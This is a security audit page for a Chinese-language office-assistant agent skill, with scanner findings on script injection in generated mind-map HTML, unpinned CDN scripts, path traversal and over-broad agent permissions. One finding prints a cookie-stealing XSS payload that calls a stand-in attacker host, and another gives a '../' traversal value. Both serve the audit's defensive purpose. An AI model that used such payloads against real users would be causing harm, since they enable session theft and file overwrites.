Back to skill

Security audit

小弟办公秘书团队

Security checks for vulnerabilities and agentic risk

Overview

This office-assistant skill is not malicious, but it asks for broad access around email, calendar, memory, sessions, command execution, and file writes without clear user control or scoping.

Install only if you are comfortable with a Chinese-language office assistant that may handle sensitive meeting notes, emails, calendars, documents, generated files, memory, and sessions. Keep it in a restricted workspace, avoid giving it live mailbox/calendar access until consent and scoping are added, review generated HTML before opening or sharing it, and prefer disabling broad exec, web_search, memory, session, and cron permissions unless each is specifically needed.

Vulnerability Patterns
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Unauthorized Access and Privilege EscalationObtains permissions beyond the task's legitimate needs
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
Findings (5)

T09 · Insecure Skill Coding Practices

Error
Location
scripts/mindmap.py:164
Finding

Stored Script Injection in Generated Markmap HTML

Content
View full analysis
{structure['title']} - 思维导图 body {{ margin: 0; padding: 20px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; }} .markmap {{ width: 100%; height: 80vh; }}

🧠 {structure['title']}

''' ``` ### Technical Analysis The title and mind-map node content originate from user-controlled input and are interpolated directly into an HTML document without context-aware escaping. The title is inserted into both `` and `<h1>` elements, while the complete Markdown tree is inserted inside a `<script type="text/template">` element. Although the template script is not directly executable, an attacker can supply a sequence such as: ```html </script><script>fetch('https://attacker.example/collect?d=' + encodeURIComponent(document.cookie))</script> ``` The injected `</script>` terminates the template element. The following script element is then parsed as executable JavaScript when the generated HTML file is opened. Escaping quotation marks or Markdown syntax alone would not address this issue because HTML parsing rules, particularly script-element termination, govern exploitation. ### Attack Path 1. An attacker supplies a malicious title, keyword, or text node to the mind-map generator. 2. `extract_structure()` or `generate_from_keywords()` preserves the malicious content as a node title. 3. `to_markmap()` inserts that content into the ...[truncated 973 chars]
Remediation
View remediation
``` 5. Add regression tests containing payloads such as ``, ``, HTML entities, and malicious titles. 6. Treat generated HTML as active content and warn users before opening files derived from untrusted input. ]]>

T03 · Remote Payload Retrieval and Execution

Warning
Location
scripts/mindmap.py:177
Finding

Mutable Remote JavaScript Is Executed by Generated Mind Maps

Content
View full analysis
``` The same dependency is already present in the bundled artifact at: ```text data/mindmaps/mindmap_20260327_163529.html:6 ``` ### Technical Analysis Generated Markmap documents retrieve and execute JavaScript from a third-party CDN whenever the document is opened. The URL does not specify an exact package version and does not use a Subresource Integrity hash. Consequently, the effective executable code is not fully contained in the audited project. It may change after review due to package updates, CDN behavior, account compromise, or supply-chain compromise. This also causes document viewing to contact an external service, which may disclose viewer metadata such as IP address, browser headers, and access time. ### Attack Path 1. The Skill generates or distributes a Markmap HTML file. 2. A user opens the file in a browser with network access. 3. The browser requests `markmap-autoloader` from jsDelivr. 4. The CDN selects and returns the current package version because no exact version is pinned. 5. The browser executes the returned JavaScript. 6. If the package or delivery channel has been compromised, attacker-controlled code runs in the document context. ### Impact Assessment A compromised or unexpectedly changed dependency could: - Execute arbitrary JavaScript in every generated Markmap document. - Modify generated content or inject deceptive UI. - Initiate unauthorized network requests. - Process and disclose the mind-map content. - Affect previously generated documents because they continue to retrieve the mutable resource at viewing time. The scope is limited to users who open the generated HTML with network access, but the issue can affect all generated Markmap documents simultan ...[truncated 11 chars]
Remediation
View remediation
/dist/index.min.js"> ``` 3. Add a verified Subresource Integrity hash and `crossorigin` attribute: ```html ``` 4. Use a Content Security Policy that limits scripts and network connections to explicitly approved sources. 5. Document the external request and provide an offline generation mode. 6. Review and update the pinned dependency through a controlled dependency-management process rather than automatically using the latest release. ]]>

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/mindmap.py:282
Finding

Path Traversal Through Mind-Map Output Filename

Content
View full analysis
Remediation
View remediation

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/meeting_minutes.py:242
Finding

Path Traversal Through Meeting-Minutes Filename

Content
View full analysis
str: """保存会议纪要""" OUTPUT_DIR.mkdir(parents=True, exist_ok=True) if not filename: filename = f"会议纪要_{datetime.now().strftime('%Y%m%d_%H%M%S')}.md" filepath = OUTPUT_DIR / filename filepath.write_text(minutes, encoding='utf-8') return str(filepath) ``` ### Technical Analysis `save_minutes()` accepts an optional filename and writes to the joined path without validating whether the final path remains under `data/meetings/`. An absolute filename can replace the configured base directory, while a filename containing `../` can escape it. Existing files are overwritten by default. Symbolic links are not checked. The bundled CLI currently calls `save_minutes(minutes)` without a custom filename. Exploitation therefore requires another caller or future integration to pass attacker-controlled data into the `filename` parameter. ### Attack Path 1. An application, workflow, or Agent integration exposes the `filename` argument. 2. An attacker supplies an absolute path or a traversal value such as `../../target.md`. 3. `OUTPUT_DIR / filename` produces a path outside the meeting directory. 4. `write_text()` writes the generated meeting content to that path. 5. Any existing writable target is replaced. ### Impact Assessment The process can create or overwrite any file permitted by its operating-system account. This may cause: - Loss or corruption of local files. - Replacement of application data or configuration. - Placement of attacker-controlled Markdown or text in unintended directories. - Secondary exploitation if another application interprets the overwritten file as active configuration or content. The flaw does not itself grant permissions beyond those ...[truncated 33 chars]
Remediation
View remediation

T05 · Unauthorized Access and Privilege Escalation

Warning
Location
architecture.json:18
Finding

Agent Configuration Grants Capabilities Beyond Demonstrated Task Requirements

Content
View full analysis
Remediation
View remediation
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (31)

Missing User Warnings

High
Category
Not specified by scanner
Confidence
97% confidence
Finding

The workflow states that the skill will pull unread emails, classify them, and extract key information, but it does not clearly warn the user that mailbox contents may be accessed and processed. Email often contains highly sensitive internal, personal, legal, or credential-related data, so undisclosed inbox access materially increases privacy, confidentiality, and accidental data exposure risk.

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
98% confidence
Finding

该描述与代码行为不符。代码没有任何日程、邮件、会议相关逻辑,也没有外部通信、日历或邮箱访问;其唯一明确功能是文档格式整理与导出 docx,最多只覆盖“文档整理/排版”中的一小部分。声明呈现的是多功能办公秘书团队,而实际代码是独立的文档排版 CLI 工具,主用途明显不同,因此应判定为描述与行为不匹配。

Content

No source excerpt is available for this finding.

Tp4

High
Category
MCP Tool Poisoning
Confidence
98% confidence
Finding

声明描述的是办公秘书类能力,如日程管理、邮件处理、文档整理、会议纪要;而实际代码并未实现这些功能。代码的核心目的,是把输入文本或关键词转换为思维导图结构并导出为多种格式文件。这与日程、邮件、会议纪要等秘书职能相比,属于明显不同的主要用途。虽然“文档整理”与文本结构化有轻微相关性,但这里的具体实现是思维导图生成工具,属于未声明且实质性不同的能力,因此应判定为描述与行为不匹配。

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
84% confidence
Finding

The skill is written as a Chinese-only persona and prescribes a specific Chinese writing style and stock phrases without indicating that users may choose another language or locale. This can violate language/locale policy when no opt-in or justified region-specific constraint is documented.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

The skill defines a workflow to scan calendars and to-do items without any visible warning, consent boundary, or clarification that user data will be accessed. In an office-assistant context, calendar entries and task lists often contain sensitive business or personal information, so silent access can create privacy and over-collection risks.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The example phrases are very generic everyday office requests like arranging meetings, organizing documents, and generating meeting notes. Broad triggers increase the chance the skill is invoked unintentionally or captures requests meant for other assistants/tools, which can lead to unintended access to emails, calendars, or documents in an office-automation context.

Content

No source excerpt is available for this finding.

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
75% confidence
Finding

The skill describes capabilities that imply reading and writing local files, but it does not declare an explicit tool scope or permission boundary. That creates ambiguity for users and hosts about what filesystem access is expected, increasing the risk of overbroad access or unintended file operations when the skill is invoked.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
86% confidence
Finding

The skill claims behaviors such as scanning calendars, tracking email, and saving or archiving files, but it does not clearly warn users about data access, retention, or write operations. In a secretary-style skill handling potentially sensitive business information, missing transparency increases the risk of unauthorized access expectations and privacy-impacting actions.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
89% confidence
Finding

Very broad routing keywords can cause the wrong sub-workflow to trigger on ordinary user text, potentially sending content into actions involving scheduling, email handling, or file generation without clear intent. In an office-assistant context, misrouting can expose sensitive content to unnecessary processing or initiate unintended state-changing operations.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
96% confidence
Finding

配置示例将语言固定为“zh-CN”,且文档整体未说明这是可选默认值、可由用户修改,或该技能仅面向特定中文场景。这构成了对语言/区域设置的强制指定,缺少用户选择或明确的正当化说明。

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
98% confidence
Finding

Granting generic exec capability to a document-management agent is dangerous because it allows arbitrary command or script execution in a role that should normally only transform user documents. In this architecture, the same agent is configured to run local scripts such as doc_formatter.py, so malformed document content, prompt injection, or unsafe task routing could potentially reach code-execution paths and expand impact to file access, environment interaction, or system compromise.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

The manifest description limits the skill to schedule management, email handling, document organization, and meeting minutes. The "mindmap-builder" agent adds separate capabilities such as mind-map generation and knowledge-system construction, which are not implied by those four office-secretary functions and appear as an extra product feature rather than an implementation detail.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The file sets timezone to Asia/Shanghai and language to zh-CN, which imposes a specific locale by default. Under the policy, forcing a specific language or locale without user opt-in or clear region-specific justification is a natural-language policy violation.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
89% confidence
Finding

The manifest description is entirely in Chinese, and the same pattern continues in feature and script descriptions. For a general-purpose productivity skill, this can amount to a language-policy issue because it implicitly forces a specific language without documenting opt-in or a region-specific limitation.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
91% confidence
Finding

The manifest hard-codes the timezone to "Asia/Shanghai", which imposes a locale-specific setting on all users. Under the policy, locale constraints should either be optional, user-selectable, or clearly justified as region-specific.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
97% confidence
Finding

SQP-3 applies to all file types and covers language/locale policy violations in natural-language text. This file consistently uses Chinese in docstrings and user-facing messages, and there is no indication that the language is optional or that the tool is intentionally limited to a Chinese-speaking context.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
93% confidence
Finding

The manifest describes an office secretary team for schedule management, email handling, document organization, and meeting minutes. The routing table adds a separate "mindmap-builder" agent for 思维导图/脑图 generation, which is not justified by the stated scope and expands the skill into a new productivity function.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

This code file contains natural-language text that presents the tool exclusively in Chinese, including the top-level description and later user-facing CLI help/error messages. Under the policy, forcing a specific language without user opt-in is a natural-language policy violation unless the locale restriction is explicitly justified.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The file’s natural-language description and generated output are entirely fixed in Chinese, indicating the skill is designed to operate in a single language. There is no user opt-in, language-selection mechanism, or documented justification that this is a region-specific tool, which makes this a language/locale policy concern.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Medium
Category
Not specified by scanner
Confidence
96% confidence
Finding

This code’s natural-language interface is entirely in Chinese, including the module description and all user-facing help/output strings, but it provides no user opt-in or configurable locale. Under the policy, forcing a specific language without user choice is a natural-language policy violation unless the locale restriction is clearly justified.

Content

No source excerpt is available for this finding.

Context-Inappropriate Capability

Medium
Category
Not specified by scanner
Confidence
90% confidence
Finding

The generated HTML embeds a remote script from jsDelivr, so opening the exported file causes execution of third-party JavaScript outside the user's control. That creates a supply-chain and privacy risk: a compromised CDN, dependency update, or network interception in weak environments could run arbitrary script in the local browser context when the file is viewed.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

The manifest describes an office secretary team for schedule management, email handling, document organization, and meeting minutes, but this file implements a standalone mind-map generator that reads arbitrary local files via --file and writes generated outputs to disk. Mind-map generation is not a clear implementation detail of the declared office-secretary functions and represents behavior outside the stated skill purpose.

Content

No source excerpt is available for this finding.

Natural-Language Policy Violations

Low
Category
Not specified by scanner
Confidence
62% confidence
Finding

All user-facing natural-language content and examples are presented only in Chinese, with no indication that users may choose another language or that the skill is intentionally limited to a Chinese-speaking context. Under the stated policy, a language restriction should either be optional for users or explicitly justified as region-specific.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Low
Category
Not specified by scanner
Confidence
87% confidence
Finding

The manifest mentions "会议纪要" for meeting support, which naturally covers minutes and follow-up items. Adding a separate visualization step to create a mind map is an additional behavior not reflected in the skill description.

Content

No source excerpt is available for this finding.

Description-Behavior Mismatch

Low
Category
Not specified by scanner
Confidence
85% confidence
Finding

The declared purpose for document handling is "文档整理", but this workflow conditionally invokes the mindmap-builder to create an outline map. Visual knowledge-map generation goes beyond ordinary document organization/formatting and is not mentioned in the manifest description.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.